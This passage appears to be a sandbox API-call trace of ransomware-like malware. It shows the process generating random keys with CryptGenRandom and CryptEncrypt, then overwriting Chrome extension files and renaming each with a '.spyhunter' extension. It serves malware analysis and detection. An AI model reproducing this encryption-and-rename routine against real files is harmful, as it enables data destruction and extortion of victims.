(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.440] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3d0*=0x30) returned 1 [0135.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.441] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0135.441] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.441] GetProcessHeap () returned 0x2c0000 [0135.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.441] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf394, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf394*=0xb3, lpOverlapped=0x0) returned 1 [0135.442] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.442] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf394, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf394*=0xb3, lpOverlapped=0x0) returned 1 [0135.442] GetProcessHeap () returned 0x2c0000 [0135.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.442] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.442] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf394, lpOverlapped=0x0 | out: lpBuffer=0x25cf3d4*, lpNumberOfBytesWritten=0x25cf394*=0x4, lpOverlapped=0x0) returned 1 [0135.442] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf394, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf394*=0x30, lpOverlapped=0x0) returned 1 [0135.442] CloseHandle (hObject=0xec) returned 1 [0135.443] GetProcessHeap () returned 0x2c0000 [0135.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.443] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.spyhunter") returned 168 [0135.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0135.443] GetProcessHeap () returned 0x2c0000 [0135.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.443] GetProcessHeap () returned 0x2c0000 [0135.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.444] GetProcessHeap () returned 0x2c0000 [0135.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82370 | out: hHeap=0x2c0000) returned 1 [0135.445] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3d0 | out: pbBuffer=0x25cf3d0) returned 1 [0135.445] GetProcessHeap () returned 0x2c0000 [0135.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.445] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3c8*=0x30) returned 1 [0135.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.446] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0135.446] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.446] GetProcessHeap () returned 0x2c0000 [0135.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.446] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf38c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf38c*=0xb3, lpOverlapped=0x0) returned 1 [0135.447] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.447] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf38c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf38c*=0xb3, lpOverlapped=0x0) returned 1 [0135.447] GetProcessHeap () returned 0x2c0000 [0135.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.447] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.447] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf38c, lpOverlapped=0x0 | out: lpBuffer=0x25cf3cc*, lpNumberOfBytesWritten=0x25cf38c*=0x4, lpOverlapped=0x0) returned 1 [0135.447] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf38c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf38c*=0x30, lpOverlapped=0x0) returned 1 [0135.447] CloseHandle (hObject=0xec) returned 1 [0135.447] GetProcessHeap () returned 0x2c0000 [0135.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.448] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.spyhunter") returned 167 [0135.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0135.449] GetProcessHeap () returned 0x2c0000 [0135.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.449] GetProcessHeap () returned 0x2c0000 [0135.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.449] GetProcessHeap () returned 0x2c0000 [0135.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f821e8 | out: hHeap=0x2c0000) returned 1 [0135.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3c8 | out: pbBuffer=0x25cf3c8) returned 1 [0135.450] GetProcessHeap () returned 0x2c0000 [0135.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3c0*=0x30) returned 1 [0135.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0135.451] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.451] GetProcessHeap () returned 0x2c0000 [0135.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.451] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf384*=0xb3, lpOverlapped=0x0) returned 1 [0135.523] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.523] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf384*=0xb3, lpOverlapped=0x0) returned 1 [0135.523] GetProcessHeap () returned 0x2c0000 [0135.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.523] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.523] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf384, lpOverlapped=0x0 | out: lpBuffer=0x25cf3c4*, lpNumberOfBytesWritten=0x25cf384*=0x4, lpOverlapped=0x0) returned 1 [0135.523] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf384, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf384*=0x30, lpOverlapped=0x0) returned 1 [0135.523] CloseHandle (hObject=0xec) returned 1 [0135.524] GetProcessHeap () returned 0x2c0000 [0135.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.524] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.spyhunter") returned 167 [0135.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0135.524] GetProcessHeap () returned 0x2c0000 [0135.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.524] GetProcessHeap () returned 0x2c0000 [0135.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.524] GetProcessHeap () returned 0x2c0000 [0135.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82060 | out: hHeap=0x2c0000) returned 1 [0135.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3b8 | out: pbBuffer=0x25cf3b8) returned 1 [0135.527] GetProcessHeap () returned 0x2c0000 [0135.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3b0*=0x30) returned 1 [0135.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0135.533] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0135.533] GetProcessHeap () returned 0x2c0000 [0135.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.533] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf374*=0x2800, lpOverlapped=0x0) returned 1 [0135.587] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.587] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf374*=0x2800, lpOverlapped=0x0) returned 1 [0135.587] GetProcessHeap () returned 0x2c0000 [0135.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.587] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.587] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf374, lpOverlapped=0x0 | out: lpBuffer=0x25cf3b4*, lpNumberOfBytesWritten=0x25cf374*=0x4, lpOverlapped=0x0) returned 1 [0135.587] WriteFile (in: hFile=0x17c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf374, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf374*=0x30, lpOverlapped=0x0) returned 1 [0135.587] CloseHandle (hObject=0x17c) returned 1 [0135.588] GetProcessHeap () returned 0x2c0000 [0135.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.588] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.spyhunter") returned 173 [0135.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0135.588] GetProcessHeap () returned 0x2c0000 [0135.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.588] GetProcessHeap () returned 0x2c0000 [0135.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.589] GetProcessHeap () returned 0x2c0000 [0135.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17ae8 | out: hHeap=0x2c0000) returned 1 [0135.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3a8 | out: pbBuffer=0x25cf3a8) returned 1 [0135.754] GetProcessHeap () returned 0x2c0000 [0135.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3a0*=0x30) returned 1 [0135.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0135.755] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.755] GetProcessHeap () returned 0x2c0000 [0135.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.755] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf364, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf364*=0xb3, lpOverlapped=0x0) returned 1 [0135.756] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.756] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf364, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf364*=0xb3, lpOverlapped=0x0) returned 1 [0135.756] GetProcessHeap () returned 0x2c0000 [0135.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.756] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.757] WriteFile (in: hFile=0x180, lpBuffer=0x25cf3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf364, lpOverlapped=0x0 | out: lpBuffer=0x25cf3a4*, lpNumberOfBytesWritten=0x25cf364*=0x4, lpOverlapped=0x0) returned 1 [0135.757] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf364, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf364*=0x30, lpOverlapped=0x0) returned 1 [0135.757] CloseHandle (hObject=0x180) returned 1 [0135.757] GetProcessHeap () returned 0x2c0000 [0135.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.757] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 170 [0135.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0135.758] GetProcessHeap () returned 0x2c0000 [0135.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.758] GetProcessHeap () returned 0x2c0000 [0135.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.758] GetProcessHeap () returned 0x2c0000 [0135.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a988 | out: hHeap=0x2c0000) returned 1 [0135.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3a0 | out: pbBuffer=0x25cf3a0) returned 1 [0135.760] GetProcessHeap () returned 0x2c0000 [0135.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf398*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf398*=0x30) returned 1 [0135.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 